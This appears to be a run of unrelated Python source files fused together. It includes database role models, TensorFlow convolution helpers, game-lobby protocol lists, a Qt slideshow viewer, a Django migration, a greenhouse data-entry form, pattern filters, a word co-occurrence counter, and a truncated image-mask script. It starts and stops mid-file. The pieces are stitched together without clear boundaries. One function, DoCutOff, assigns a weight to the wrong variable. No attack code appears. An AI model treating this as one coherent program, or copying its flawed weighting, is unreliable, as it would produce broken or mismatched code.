foreign_keys="UserFieldEntries.user_id") class Rights(db.Model): __tablename__ = "rights" id = db.Column(db.Integer, primary_key=True) name = db.Column(db.Text) def __init__(self, *args, **kwargs): super(Rights, self).__init__(**kwargs) class Roles(db.Model): __tablename__ = "roles" id = db.Column(db.Integer, primary_key=True) name = db.Column(db.Text) def __init__(self, *args, **kwargs): super(Roles, self).__init__(**kwargs) class RoleRights(db.Model): __tablename__ = "role_rights" role_id = db.Column(db.Integer, db.ForeignKey("roles.id", ondelete="CASCADE"), primary_key=True, nullable=False) right_id = db.Column(db.Integer, db.ForeignKey("rights.id", ondelete="CASCADE"), primary_key=True, nullable=False) def __init__(self, *args, **kwargs): super(RoleRights, self).__init__(**kwargs) class UserRights(db.Model): __tablename__ = "user_rights" user_id = db.Column(db.Integer, db.ForeignKey("users.id", ondelete="CASCADE"), primary_key=True, nullable=False) right_id = db.Column(db.Integer, db.ForeignKey("rights.id", ondelete="CASCADE"), primary_key=True, nullable=False) def __init__(self, *args, **kwargs): super(UserRights, self).__init__(**kwargs) 10-100 import tensorflow as tf weight_decay=1e-4 def relu(x, name='relu6'): return tf.nn.relu6(x, name) def batch_norm(x, momentum=0.9, epsilon=1e-5, train=True, name='bn'): return tf.layers.batch_normalization(x, momentum=momentum, epsilon=epsilon, scale=True, training=train, name=name) def conv2d(input_, output_dim, k_h, k_w, d_h, d_w, stddev=0.02, name='conv2d', bias=False): with tf.variable_scope(name): w = tf.get_variable('w', [k_h, k_w, input_.get_shape()[-1], output_dim], regularizer=tf.contrib.layers.l2_regularizer(weight_decay), initializer=tf.truncated_normal_initializer(stddev=stddev)) conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding='SAME') if bias: biases = tf.get_variable('bias', [output_dim], initializer=tf.constant_initializer(0.0)) conv = tf.nn.bias_add(conv, biases) return conv def conv2d_block(input, out_dim, k, s, is_train, name): with tf.name_scope(name), tf.variable_scope(name): net = conv2d(input, out_dim, k, k, s, s, name='conv2d') net = batch_norm(net, train=is_train, name='bn') net = relu(net) return net def conv_1x1(input, output_dim, name, bias=False): with tf.name_scope(name): return conv2d(input, output_dim, 1,1,1,1, stddev=0.02, name=name, bias=bias) def pwise_block(input, output_dim, is_train, name, bias=False): with tf.name_scope(name), tf.variable_scope(name): out=conv_1x1(input, output_dim, bias=bias, name='pwb') out=batch_norm(out, train=is_train, name='bn') out=relu(out) return out def dwise_conv(input, k_h=3, k_w=3, channel_multiplier= 1, strides=[1,1,1,1], padding='SAME', stddev=0.02, name='dwise_conv', bias=False): with tf.variable_scope(name): in_channel=input.get_shape().as_list()[-1] w = tf.get_variable('w', [k_h, k_w, in_channel, channel_multiplier], regularizer=tf.contrib.layers.l2_regularizer(weight_decay), initializer=tf.truncated_normal_initializer(stddev=stddev)) conv = tf.nn.depthwise_conv2d(input, w, strides, padding, rate=None,name=None,data_format=None) if bias: biases = tf.get_variable('bias', [in_channel*channel_multiplier], initializer=tf.constant_initializer(0.0)) conv = tf.nn.bias_add(conv, biases) return conv def res_block(input, expansion_ratio, output_dim, stride, is_train, name, bias=False, shortcut=True): with tf.name_scope(name), tf.variable_scope(name): # pw bottleneck_dim=round(expansion_ratio*input.get_shape().as_list()[-1]) net = conv_1x1(input, bottleneck_dim, name='pw', bias=bias) net = batch_norm(net, train=is_train, name='pw_bn') net = relu(net) # dw net = dwise_conv(net, strides=[1, stride, stride, 1], name='dw', bias=bias) net = batch_norm(net, train=is_train, name='dw_bn') net = relu(net) # pw & linear net = conv_1x1(net, output_dim, name='pw_linear', bias=bias) net = batch_norm(net, train=is_train, name='pw_linear_bn') # element wise add, only for stride==1 if shortcut and stride == 1: in_dim=int(input.get_shape().as_list()[-1]) if in_dim != output_dim: ins=conv_1x1(input, output_dim, name='ex_dim') net=ins+net else: net=input+net return net def separable_conv(input, k_size, output_dim, stride, pad='SAME', channel_multiplier=1, name='sep_conv', bias=False): with tf.name_scope(name), tf.variable_scope(name): in_channel = input.get_shape().as_list()[-1] dwise_filter = tf.get_variable('dw', [k_size, k_size, in_channel, channel_multiplier], regularizer=tf.contrib.layers.l2_regularizer(weight_decay), initializer=tf.truncated_normal_initializer(stddev=0.02)) pwise_filter = tf.get_variable('pw', [1, 1, in_channel*channel_multiplier, output_dim], regularizer=tf.contrib.layers.l2_regularizer(weight_decay), initializer=tf.truncated_normal_initializer(stddev=0.02)) strides = [1,stride, stride,1] conv=tf.nn.separable_conv2d(input,dwise_filter,pwise_filter,strides,padding=pad, name=name) if bias: biases = tf.get_variable('bias', [output_dim],initializer=tf.constant_initializer(0.0)) conv = tf.nn.bias_add(conv, biases) return conv def global_avg(x): with tf.name_scope('global_avg'): net=tf.layers.average_pooling2d(x, x.get_shape()[1:-1], 1) return net def flatten(x): #flattened=tf.reshape(input,[x.get_shape().as_list()[0], -1]) # or, tf.layers.flatten(x) return tf.contrib.layers.flatten(x) def pad2d(inputs, pad=(0, 0), mode='CONSTANT'): paddings = [[0, 0], [pad[0], pad[0]], [pad[1], pad[1]], [0, 0]] net = tf.pad(inputs, paddings, mode=mode) return netTurBoss/tasbot3 """Lists of all currently documented lobby protocol commands. Extraced from ProtocolDescription.xml with bibim's perl script (see scripts/) """ client = ( 'ADDBOT', 'ADDSTARTRECT', 'CHANGEPASSWORD', 'CHANNELS', 'CHANNELTOPIC', 'CONFIRMAGREEMENT', 'DISABLEUNITS', 'ENABLEALLUNITS', 'ENABLEUNITS', 'FORCEALLYNO', 'FORCELEAVECHANNEL', 'FORCESPECTATORMODE', 'FORCETEAMCOLOR', 'FORCETEAMNO', 'HANDICAP', 'JOIN', 'JOINBATTLE', 'JOINBATTLEACCEPT', 'JOINBATTLEDENY', 'KICKFROMBATTLE', 'LEAVE', 'LEAVEBATTLE', 'LOGIN', 'MUTELIST', 'MYBATTLESTATUS', 'MYSTATUS', 'OPENBATTLE', 'PING', 'PROPERTIESDEFINE', 'PROPERTIESGET', 'PROPERTIESLISTEN', 'PROPERTIESSET', 'REGISTER', 'REMOVEBOT', 'REMOVESCRIPTTAGS', 'REMOVESTARTRECT', 'RENAMEACCOUNT', 'RING', 'SAY', 'SAYBATTLE', 'SAYBATTLEEX', 'SAYEX', 'SAYPRIVATE', 'SCRIPT', 'SCRIPTEND', 'SCRIPTSTART', 'SETSCRIPTTAGS', 'TESTLOGIN', 'UPDATEBATTLEINFO', 'UPDATEBOT', 'USERID' ) server = ( 'ACCEPTED', 'ACQUIREUSERID', 'ADDBOT', 'ADDSTARTRECT', 'ADDUSER', 'AGREEMENT', 'AGREEMENTEND', 'BATTLECLOSED', 'BATTLEOPENED', 'BROADCAST', 'CHANNEL', 'CHANNELMESSAGE', 'CHANNELTOPIC', 'CLIENTBATTLESTATUS', 'CLIENTIPPORT', 'CLIENTS', 'CLIENTSTATUS', 'DENIED', 'DISABLEUNITS', 'ENABLEALLUNITS', 'ENABLEUNITS', 'ENDOFCHANNELS', 'FORCELEAVECHANNEL', 'FORCEQUITBATTLE', 'HOSTPORT', 'JOIN', 'JOINBATTLE', 'JOINBATTLEFAILED', 'JOINBATTLEREQUEST', 'JOINED', 'JOINEDBATTLE', 'JOINFAILED', 'LEFT', 'LEFTBATTLE', 'LOGININFOEND', 'MOTD', 'MUTELIST', 'MUTELISTBEGIN', 'MUTELISTEND', 'OFFERFILE', 'OPENBATTLE', 'OPENBATTLEFAILED', 'PONG', 'PROPERTIESVALUES', 'REDIRECT', 'REGISTRATIONACCEPTED', 'REGISTRATIONDENIED', 'REMOVEBOT', 'REMOVESCRIPTTAGS', 'REMOVESTARTRECT', 'REMOVEUSER', 'REQUESTBATTLESTATUS', 'REQUESTUPDATEFILE', 'RING', 'SAID', 'SAIDBATTLE', 'SAIDBATTLEEX', 'SAIDEX', 'SAIDPRIVATE', 'SAYPRIVATE', 'SCRIPT', 'SCRIPTEND', 'SCRIPTSTART', 'SERVERMSG', 'SERVERMSGBOX', 'SETSCRIPTTAGS', 'TASSERVER', 'TESTLOGINACCEPT', 'TESTLOGINDENY', 'UDPSOURCEPORT', 'UPDATEBATTLEINFO', 'UPDATEBOT') hard-gists/2477361/snippet.py10-100 #!/usr/bin/env python """ If you use landslide to create slideshows using markdown, you may have found yourself repeating endlessly: + save source document + switch to the terminal to run landslide + reload the generated html in your browser This QT (using webkit) based "application" monitor changes to the source file and automatically regenerates the HTML and refreshes the "browser". $ ./qtkit.py --help usage: qtkit.py [-h] --landslide LANDSLIDE [--port PORT] [--html HTML] file landslide text to html viewer positional arguments: file text file (md or rst) optional arguments: -h, --help show this help message and exit --landslide LANDSLIDE path to the landslide binary --port PORT simple http server port (default 8000) --html HTML html filename (default presentation.html) To quit close the QT window or press ctrl + c in the terminal. """ import sys import os import signal import subprocess import SimpleHTTPServer import SocketServer from multiprocessing import Process import argparse from PyQt4.QtCore import * from PyQt4.QtGui import * from PyQt4.QtWebKit import * class FullHelpArgumentParser(argparse.ArgumentParser): """ argument parser displaying the complete help on error """ # http://stackoverflow.com/a/4042861/753565 def error(self, message): sys.stderr.write('error: %s\n' % message) self.print_help() sys.exit(2) def parse_arguments(): """ argparse wrapper """ parser = FullHelpArgumentParser(description='landslide text to html viewer') parser.add_argument('file', help='text file (md or rst)', action='store') parser.add_argument('--landslide', help='path to the landslide binary', action='store', required=True) parser.add_argument('--port', type=int, help='simple http server port (default 8000)', default=8000, action='store') parser.add_argument('--html', help='html filename (default presentation.html)', default='presentation.html', action='store') return parser.parse_args() def http_server(path, port): """ start a simple http server listening on port serving files from path """ os.chdir(path) handler = SimpleHTTPServer.SimpleHTTPRequestHandler # http://stackoverflow.com/questions/337115/setting-time-wait-tcp SocketServer.TCPServer.allow_reuse_address = True http = SocketServer.TCPServer(('', port), handler) # handling a ctrl-c termination try: http.serve_forever() except KeyboardInterrupt: pass def landslide(args): """ run args.landslide on args.file to create args.html """ html_file = os.path.join(os.path.dirname(args.file), args.html) subprocess.call([args.landslide, '--embed', args.file, '-d', html_file]) def start_fs_watcher(web, args): """ create a watcher on args.file, calling landslide and reloading web """ # http://stackoverflow.com/a/5339877/753565 @pyqtSlot(str) def file_changed(path): landslide(args) web.reload() fs_watcher = QFileSystemWatcher([args.file]) fs_watcher.connect(fs_watcher, SIGNAL('fileChanged(QString)'), file_changed) return fs_watcher def main(): args = parse_arguments() # using multiprocessing to start the http server in its own process http = Process(target=http_server, args=(os.path.dirname(args.file), args.port)) http.start() app = QApplication([]) web = QWebView() fs_watcher = start_fs_watcher(web, args) # compare html and text file last modified dates to only process if necessary mtime_text_file = os.path.getmtime(args.file) try: mtime_html_file = os.path.getmtime(os.path.join(os.path.dirname(args.file), args.html)) except OSError: mtime_html_file = 0 if mtime_text_file > mtime_html_file: landslide(args) web.load(QUrl('http://localhost:%i/%s' % (args.port, args.html))) web.show() # exiting from the command line (ctrl+c) signal.signal(signal.SIGINT, signal.SIG_DFL) # starting the QT event loop app.exec_() # del fs_watcher in a cleanup slot connected to the aboutToQuit signal doesn't work del fs_watcher http.terminate() if __name__ == '__main__': main()# Generated by Django 2.2 on 2019-04-07 10:43 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('userprofile', '0001_initial'), ] operations = [ migrations.AddField( model_name='doctormodel', name='is_approved_by_admin', field=models.BooleanField(default=False), ), migrations.AddField( model_name='patientmodel', name='is_open_for_appointment', field=models.BooleanField(default=True), ), ] import sys from PyQt5.QtWidgets import * from PyQt5.QtGui import * from PyQt5.QtCore import Qt import sqlite3 import main connection = sqlite3.connect("hezarfendata.db") cursor = connection.cursor() class seraKapak(QWidget): def __init__(self): super().__init__() self.setWindowTitle("Sera Kapağı") self.setWindowIcon(QIcon("icons/serakapak.ico")) self.setGeometry(600,350,600,450) self.setFixedSize(self.size())#kullanıcı pencereyi büyültemez küçültemez self.UI() self.show() def UI(self): self.setStyleSheet("background-color:white") main_layout = QVBoxLayout() topFrame = QFrame(self) topFrame.setStyleSheet("background-color:white") top_layout = QHBoxLayout(topFrame) bottomFrame = QFrame(self) bottom_layout = QFormLayout(bottomFrame) bottomFrame.setStyleSheet("font:15pt Times Bold;background-color:#fcc324") img_book = QLabel(topFrame) img = QPixmap("icons/automationps.png") img_book.setPixmap(img) lbl_title = QLabel("Sera Kapağı",topFrame) lbl_title.setStyleSheet("color:#003f8a;font:25pt Times Bold") top_layout.addStretch() top_layout.addWidget(img_book) top_layout.addWidget(lbl_title) top_layout.addStretch() main_layout.addWidget(topFrame) ###############bottom frame DESİGN################## self.sera_kapağı_tarih_entry = QLineEdit(bottomFrame) self.sera_kapağı_tarih_entry.setPlaceholderText("Tarih") self.sera_kapağı_tarih_entry.setStyleSheet("background-color:white") self.sera_kapak_durum_entry = QLineEdit(bottomFrame) self.sera_kapak_durum_entry.setPlaceholderText("Açık/Kapalı") self.sera_kapak_durum_entry.setStyleSheet("background-color:white") sera_kapak_durum_add_button = QPushButton("Ekle",bottomFrame) sera_kapak_durum_add_button.clicked.connect(self.seraKapakpage) bottom_layout.addRow(QLabel("Tarih Giriniz :"),self.sera_kapağı_tarih_entry) bottom_layout.addRow(QLabel("Durum Giriniz Açık/Kapalı :"),self.sera_kapak_durum_entry) bottom_layout.addRow(QLabel(""),sera_kapak_durum_add_button) main_layout.addWidget(bottomFrame) self.setLayout(main_layout) def seraKapakpage(self): tarih = self.sera_kapağı_tarih_entry.text() serakapakdurum = self.sera_kapak_durum_entry.text() if (tarih and serakapakdurum != ""): try: query = "INSERT INTO 'seradurum' (tarih,durum) VALUES (?,?)" cursor.execute(query,(tarih,serakapakdurum)) connection.commit() self.sera_kapağı_tarih_entry.setText("") self.sera_kapak_durum_entry.setText("") QMessageBox.information(self,"Sera Kapağı","Sera Kapak Durumu eklendi") except: QMessageBox.information(self, "Uyarı!", "Sera Kapak Durumu Eklenemedi") else: QMessageBox.information(self, "Uyarı!", "Alanlar Boş kalamaz")"""Simple Filter support""" import re import fnmatch class BaseFilter(object): """Filter a string based on a list of regular expression or glob patterns. This should be inherited and the __call__ overriden with a real implementation """ __slots__ = ("patterns", "_re_options") def __init__(self, patterns, case_insensitive=True): self.patterns = list(patterns) if case_insensitive: self._re_options = re.M | re.U | re.I else: self._re_options = re.M | re.U def add_glob(self, glob): """Add a glob pattern to this filter Internally all globs are converted to regular expressions using `fnmatch.translate()` :param glob: glob pattern to add :type glob: str """ self.patterns.append(fnmatch.translate(glob)) def add_regex(self, regex): """Add a regular expression pattern to this filter :param regex: regular expression pattern to add to this filter. :type regex: str """ self.patterns.append(regex) def __call__(self, item): """Run this filter - return True if filtered and False otherwise. :param item: item to check against this filter :type item: str """ raise NotImplementedError() def __repr__(self): return self.__class__.__name__ + "(patterns=%r)" % self.patterns class IncludeFilter(BaseFilter): """Include only objects that match *all* assigned filters""" def __call__(self, item): for _pattern in self.patterns: if re.match(_pattern, item, self._re_options) is not None: return False return True class ExcludeFilter(BaseFilter): """Exclude objects that match any filter""" def __call__(self, item): for _pattern in self.patterns: if re.match(_pattern, item, self._re_options) is not None: return True return False def exclude_glob(*pattern): """Create an exclusion filter from a glob pattern""" result = [] for pat in pattern: result.append(fnmatch.translate(pat)) return ExcludeFilter(result) def include_glob(*pattern): """Create an inclusion filter from glob patterns""" result = [] for pat in pattern: result.append(fnmatch.translate(pat)) return IncludeFilter(result) def include_glob_qualified(*pattern): """Create an inclusion filter from glob patterns Additionally ensure the pattern is for a qualified table name. If not '.' is found in the name, this implies an implicit *. before the name """ result = [] for pat in pattern: if "." not in pat: pat = "*." + pat result.append(pat) return include_glob(*result) def exclude_glob_qualified(*pattern): """Create an exclusion filter from glob patterns Additionally ensure the pattern is for a qualified table name. If not '.' is found in the name, this implies an implicit *. before the name """ result = [] for pat in pattern: if "." not in pat: pat = "*." + pat result.append(pat) return exclude_glob(*result) matteoarru/PROKEX-K-Fit # -*- coding: utf-8 -*- """ Created on Fri Jan 19 09:50:42 2018 @author: matte """ text1=["poor", "management"] text2=["good", "management"] text3=["people", "management"] text4=["management"] import difflib seq = difflib.SequenceMatcher(None," ".join(text1)," ".join(text2)).ratio()*100 print (seq) seq = difflib.SequenceMatcher(None," ".join(text1)," ".join(text3)).ratio()*100 print (seq) seq = difflib.SequenceMatcher(None," ".join(text1)," ".join(text4)).ratio()*100 print (seq) seq = difflib.SequenceMatcher(None," ".join(text1)," ".join(text1)).ratio()*100 print (seq)import wandb DATA_URL = "https://data.keithito.com/data/speech/LJSpeech-1.1.tar.bz2" def register_data(url=DATA_URL): run = wandb.init(job_type="register-data") data_artifact = wandb.Artifact("ljs-tarball", type="raw data") data_artifact.add_reference(url, name="tarball") run.log_artifact(data_artifact) if __name__ == "__main__": register_data() #! /usr/bin/python3 # -*- coding: utf-8 -*- #-------------------------------------------------------------------------------------------------- # Script to count words and their cooccurrences # # Usage: # count_cooccurrences.py [--data_prefix str] [--language str] # (It reads the standard input and makes files in the data directory.) # # Example: # $ bzcat enwiki-tokenized.tsv.bz2 | # ./count_cooccurrences.py --data_prefix enwiki --language en # $ bzcat jawiki-tokenized.tsv.bz2 | # ./count_cooccurrences.py --data_prefix jawiki --language ja # # Copyright 2020 Google LLC # Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file # except in compliance with the License. You may obtain a copy of the License at # https://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software distributed under the # License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, # either express or implied. See the License for the specific language governing permissions # and limitations under the License. #-------------------------------------------------------------------------------------------------- import logging import math import operator import os import regex import struct import sys import time import tkrzw import tkrzw_dict MAX_SENTENCES_PER_DOC = 64 SCORE_DECAY = 0.95 SENTENCE_GAP_PENALTY = 0.5 WINDOW_SIZE = 20 #BATCH_MAX_WORDS = 5000000 # for 1GB RAM usage BATCH_MAX_WORDS = 100000000 # for 10GB RAM usage BATCH_CUTOFF_FREQ = 4 MIN_WORD_COUNT_IN_BATCH = 16 MIN_COOC_COUNT_IN_BATCH = 4 MAX_COOC_PER_WORD = 256 MERGE_DB_UNIT = 16 PROB_CACHE_CAPACITY = 50000 logger = tkrzw_dict.GetLogger() class WordCountBatch: def __init__(self, data_prefix, language): self.data_prefix = data_prefix self.language = language self.num_batches = 0 def Run(self): start_time = time.time() logger.info("Process started: data_prefix={}, language={}".format( self.data_prefix, self.language)) self.Start() num_documents, num_sentences, num_words = 0, 0, 0 for line in sys.stdin: line = line.strip() sentences = line.split("\t") if not sentences: continue sentences = sentences[:MAX_SENTENCES_PER_DOC] num_documents += 1 num_sentences += len(sentences) document = [] for sentence in sentences: sentence = sentence.lower() words = sentence.split(" ") num_words += len(words) document.append(words) if num_documents % 100 == 0: logger.info( "Processing: documents={}, sentences={}, words={}, RSS={:.2f}MB".format( num_documents, num_sentences, num_words, tkrzw.Utility.GetMemoryUsage() / 1024.0 / 1024)) self.FeedDocument(document) self.Finish(num_sentences) logger.info( "Process done: documents={}, sentences={}, words={}, elapsed_time={:.2f}s".format( num_documents, num_sentences, num_words, time.time() - start_time)) def Start(self): self.mem_word_count = tkrzw.DBM() self.mem_word_count.Open("", True, dbm="BabyDBM").OrDie() self.mem_cooc_count = tkrzw.DBM() self.mem_cooc_count.Open("", True, dbm="BabyDBM").OrDie() self.num_documents = 0 self.num_sentences = 0 self.num_words = 0 self.num_words_since_cutoff = 0 self.start_time = time.time() def FeedDocument(self, document): words = self.MartializeWords(document) self.num_documents += 1 self.num_sentences += len(document) self.num_words += len(words) self.num_words_since_cutoff += len(words) uniq_word_pairs = set() for word_index, word_pair in enumerate(words): if word_pair in uniq_word_pairs: continue uniq_word_pairs.add(word_pair) word, sentence_index = word_pair cooc_word_index = max(word_index - WINDOW_SIZE, 0) max_word_index = min(word_index + WINDOW_SIZE, len(words) - 1) scores = {} while cooc_word_index <= max_word_index: cooc_word, cooc_sentence_index = words[cooc_word_index] if cooc_word != word: diff = abs(word_index - cooc_word_index) - 1 score = tkrzw_dict.COOC_BASE_SCORE * (SCORE_DECAY ** diff) if cooc_sentence_index != sentence_index: score *= SENTENCE_GAP_PENALTY scores[cooc_word] = max((scores.get(cooc_word) or 0), int(score)) cooc_word_index += 1 self.RegisterWords(word, scores) if self.num_words >= BATCH_MAX_WORDS: self.Dump() self.Start() elif self.num_words_since_cutoff >= BATCH_MAX_WORDS / BATCH_CUTOFF_FREQ: self.DoCutOff() def Finish(self, total_num_sentences): if self.num_words: self.Dump() self.mem_word_count = None self.mem_cooc_count = None word_count_paths = [] cooc_count_paths = [] for index in range(0, self.num_batches): word_count_path = "{}-word-count-{:08d}.tks".format(self.data_prefix, index) cooc_count_path = "{}-cooc-count-{:08d}.tks".format(self.data_prefix, index) if os.path.isfile(word_count_path): logger.info("Detected merging ID {}".format(index)) word_count_paths.append(word_count_path) cooc_count_paths.append(cooc_count_path) if len(word_count_paths) > 1: logger.info("Merging word count databases") src_word_count_paths = word_count_paths[:-1] dest_word_count_path = word_count_paths[-1] self.MergeDatabases(src_word_count_paths, dest_word_count_path) else: dest_word_count_path = word_count_paths[0] if len(cooc_count_paths) > 1: logger.info("Merging cooccurrence count databases") src_cooc_count_paths = cooc_count_paths[:-1] dest_cooc_count_path = cooc_count_paths[-1] self.MergeDatabases(src_cooc_count_paths, dest_cooc_count_path) else: dest_cooc_count_path = cooc_count_paths[0] word_count_path = tkrzw_dict.GetWordCountPath(self.data_prefix) cooc_count_path = tkrzw_dict.GetCoocCountPath(self.data_prefix) logger.info("Finishing {} batches: word_count_path={}, cooc_count_path={}".format( self.num_batches, word_count_path, cooc_count_path)) os.rename(dest_word_count_path, word_count_path) os.rename(dest_cooc_count_path, cooc_count_path) def MartializeWords(self, document): words = [] for i, doc_words in enumerate(document): for word in doc_words: words.append((word, i)) return words def RegisterWords(self, word, scores): self.mem_word_count.Increment(word) for score in scores.items(): pair_key = word + " " + score[0] self.mem_cooc_count.Increment(pair_key, score[1]) def Dump(self): logger.info("Batch {} aggregation done: elapsed_time={:.2f}s, RSS={:.2f}MB".format( self.num_batches + 1, time.time() - self.start_time, tkrzw.Utility.GetMemoryUsage() / 1024.0 / 1024)) logger.info( ("Batch {} dumping: documents={}, sentences={}, words={}," + " unique_words={}, unique_cooc={}").format( self.num_batches + 1, self.num_documents, self.num_sentences, self.num_words, self.mem_word_count.Count(), self.mem_cooc_count.Count())) start_time = time.time() fill_ratio = min(self.num_words / BATCH_MAX_WORDS, 1.0) dbm_cooc_count_path = "{}-cooc-count-{:08d}.tks".format(self.data_prefix, self.num_batches) dbm_cooc_count = tkrzw.DBM() dbm_cooc_count.Open( dbm_cooc_count_path, True, dbm="SkipDBM", truncate=True, insert_in_order=True, offset_width=5, step_unit=16, max_level=8).OrDie() logger.info("Batch {} cooc count dumping: dest={}".format( self.num_batches + 1, dbm_cooc_count_path)) dbm_cooc_count.Set("", self.num_sentences).OrDie() it = self.mem_cooc_count.MakeIterator() it.First() min_word_count = math.ceil(MIN_WORD_COUNT_IN_BATCH * fill_ratio) if MIN_WORD_COUNT_IN_BATCH >= 2: min_word_count = max(min_word_count, 2) min_count = math.ceil(tkrzw_dict.COOC_BASE_SCORE * MIN_COOC_COUNT_IN_BATCH * fill_ratio) cur_word = None cur_word_count = 0 cur_word_weight = 1.0 cooc_words = [] while True: record = it.Get() if not record: break word_pair = record[0].decode() count = struct.unpack(">q", record[1])[0] word, cooc_word = word_pair.split(" ") if cur_word != word: if cur_word and cooc_words: self.DumpCoocWords(cur_word, cooc_words, dbm_cooc_count) cur_word = word cur_word_count = struct.unpack(">q", self.mem_word_count.Get(cur_word))[0] cur_word_weight = 1.0 if tkrzw_dict.IsNumericWord(cur_word): cur_word_weight = tkrzw_dict.NUMERIC_WORD_WEIGHT elif tkrzw_dict.IsStopWord(self.language, cur_word): cur_word_weight = tkrzw_dict.STOP_WORD_WEIGHT cooc_words = [] if cur_word_count * cur_word_weight >= min_word_count: cooc_count = struct.unpack(">q", self.mem_word_count.Get(cooc_word))[0] cooc_weight = 1.0 if tkrzw_dict.IsNumericWord(cooc_word): cooc_weight = tkrzw_dict.NUMERIC_WORD_WEIGHT elif tkrzw_dict.IsStopWord(self.language, cooc_word): cooc_weight = tkrzw_dict.STOP_WORD_WEIGHT cooc_prob = cooc_count / self.num_sentences cooc_idf = min(math.log(cooc_prob) * -1, tkrzw_dict.MAX_IDF_WEIGHT) score = count * (cooc_idf ** tkrzw_dict.IDF_POWER) score *= cur_word_weight * cooc_weight if (cooc_count * cooc_weight >= min_word_count and count * cur_word_weight * cooc_weight >= min_count): cooc_words.append((cooc_word, count, score)) it.Remove() if cur_word and cooc_words: self.DumpCoocWords(cur_word, cooc_words, dbm_cooc_count) dbm_cooc_count.Close().OrDie() dbm_word_count_path = "{}-word-count-{:08d}.tks".format(self.data_prefix, self.num_batches) dbm_word_count = tkrzw.DBM() dbm_word_count.Open( dbm_word_count_path, True, dbm="SkipDBM", truncate=True, insert_in_order=True, offset_width=4, step_unit=4, max_level=12).OrDie() logger.info("Batch {} word count dumping: dest={}".format( self.num_batches + 1, dbm_word_count_path)) dbm_word_count.Set("", self.num_sentences).OrDie() it = self.mem_word_count.MakeIterator() it.First() while True: record = it.Get() if not record: break word = record[0] count = struct.unpack(">q", record[1])[0] if count >= min_word_count: dbm_word_count.Set(word, count).OrDie() it.Remove() dbm_word_count.Close().OrDie() logger.info("Dumping done: elapsed_time={:.2f}s".format(time.time() - start_time)) self.num_batches += 1 merge_db_unit = 1 while self.num_batches % (merge_db_unit * MERGE_DB_UNIT) == 0: merge_db_unit *= MERGE_DB_UNIT self.ReduceDatabases(merge_db_unit) self.num_words_since_cutoff = 0 def DumpCoocWords(self, word, cooc_words, dbm_cooc_count): top_cooc_words = sorted( cooc_words, key=operator.itemgetter(2), reverse=True)[:MAX_COOC_PER_WORD] records = [] for cooc_word, count, score in top_cooc_words: pair_key = (word + " " + cooc_word).encode() records.append((pair_key, int(count))) for pair_key, count in sorted(records): dbm_cooc_count.Set(pair_key, count).OrDie() def DoCutOff(self): start_time = time.time() logger.info( ("Batch {} cutoff: documents={}, sentences={}, words={}," + " unique_words={}, unique_cooc={}").format( self.num_batches + 1, self.num_documents, self.num_sentences, self.num_words, self.mem_word_count.Count(), self.mem_cooc_count.Count())) it = self.mem_cooc_count.MakeIterator() it.First() min_count = math.ceil(tkrzw_dict.COOC_BASE_SCORE * MIN_COOC_COUNT_IN_BATCH / BATCH_CUTOFF_FREQ) cur_word = None cur_word_weight = 1.0 while True: record = it.Get() if not record: break word_pair = record[0].decode() count = struct.unpack(">q", record[1])[0] word, cooc_word = word_pair.split(" ") if cur_word != word: cur_word = word cur_word_weight = 1.0 if tkrzw_dict.IsNumericWord(cur_word): cur_word_weight = tkrzw_dict.NUMERIC_WORD_WEIGHT elif tkrzw_dict.IsStopWord(self.language, cur_word): cur_word_weight = tkrzw_dict.STOP_WORD_WEIGHT cooc_word_weight = 1.0 if tkrzw_dict.IsNumericWord(cooc_word): cur_word_weight = tkrzw_dict.NUMERIC_WORD_WEIGHT elif tkrzw_dict.IsStopWord(self.language, cooc_word): cur_word_weight = tkrzw_dict.STOP_WORD_WEIGHT if count * cur_word_weight * cooc_word_weight < min_count: it.Remove() else: it.Next() logger.info("Cutoff done: elapsed_time={:.2f}s, unique_cooc={}".format( time.time() - start_time, self.mem_cooc_count.Count())) self.num_words_since_cutoff = 0 def ReduceDatabases(self, merge_db_unit): step = int(merge_db_unit / MERGE_DB_UNIT) index = self.num_batches - merge_db_unit + step - 1 dest_index = self.num_batches - 1 src_word_count_paths = [] src_cooc_count_paths = [] while index < dest_index: logger.info("Detected merging source ID {}".format(index)) src_word_count_paths.append("{}-word-count-{:08d}.tks".format(self.data_prefix, index)) src_cooc_count_paths.append("{}-cooc-count-{:08d}.tks".format(self.data_prefix, index)) index += step dest_word_count_path = "{}-word-count-{:08d}.tks".format(self.data_prefix, dest_index) dest_cooc_count_path = "{}-cooc-count-{:08d}.tks".format(self.data_prefix, dest_index) logger.info("Merging word count DBM files to {}".format(dest_word_count_path)) start_time = time.time() self.MergeDatabases(src_word_count_paths, dest_word_count_path) logger.info("Merging done: elapsed_time={:.2f}s".format(time.time() - start_time)) logger.info("Merging cooccurrence count DBM files to {}".format(dest_cooc_count_path)) start_time = time.time() self.MergeDatabases(src_cooc_count_paths, dest_cooc_count_path) logger.info("Merging done: elapsed_time={:.2f}s".format(time.time() - start_time)) def MergeDatabases(self, src_paths, dest_path): dbm = tkrzw.DBM() dbm.Open(dest_path, True, dbm="SkipDBM").OrDie() merge_expr = ':'.join(src_paths) dbm.Synchronize(False, merge=merge_expr, reducer="total").OrDie() dbm.Close().OrDie() for src_path in src_paths: os.remove(src_path) def main(): args = sys.argv[1:] data_prefix = tkrzw_dict.GetCommandFlag(args, "--data_prefix", 1) or "result" language = tkrzw_dict.GetCommandFlag(args, "--language", 1) or "en" if tkrzw_dict.GetCommandFlag(args, "--quiet", 0): logger.setLevel(logging.ERROR) if args: raise RuntimeError("unknown arguments: {}".format(str(args))) WordCountBatch(data_prefix, language).Run() if __name__=="__main__": main() Charles-Lu/Labelme-to-Binary-PNG-Mask import glob import os import random import json # from shapely import geometry import PIL.ImageDraw as ImageDraw import PIL.Image as Image import math # save mask in "8_bit_binary" or "1_bit_binary", # 8-bit mode has better compatibility in general mode = "8_bit_binary" in_dir = "image" out_dir = "mask" mask_list = {"rune_success", "rune_shoot", "rune_target", "rune_center", "rune_blank"} # set of label names # create output directories if not os.path.exists(out_dir): os.makedirs(out_dir) for name in mask_list: new_dir = os.path.join(out_dir, name) if not os.path.exists(new_dir): os.makedirs(new_dir) # set image mode if mode == "1_bit_binary": pil_mode = "1" pil_fill = 1 elif mode == "8_bit_binary": pil_mode = "L" pil_fill = 255 else: raise Exception("Illegal image mode!") # begin 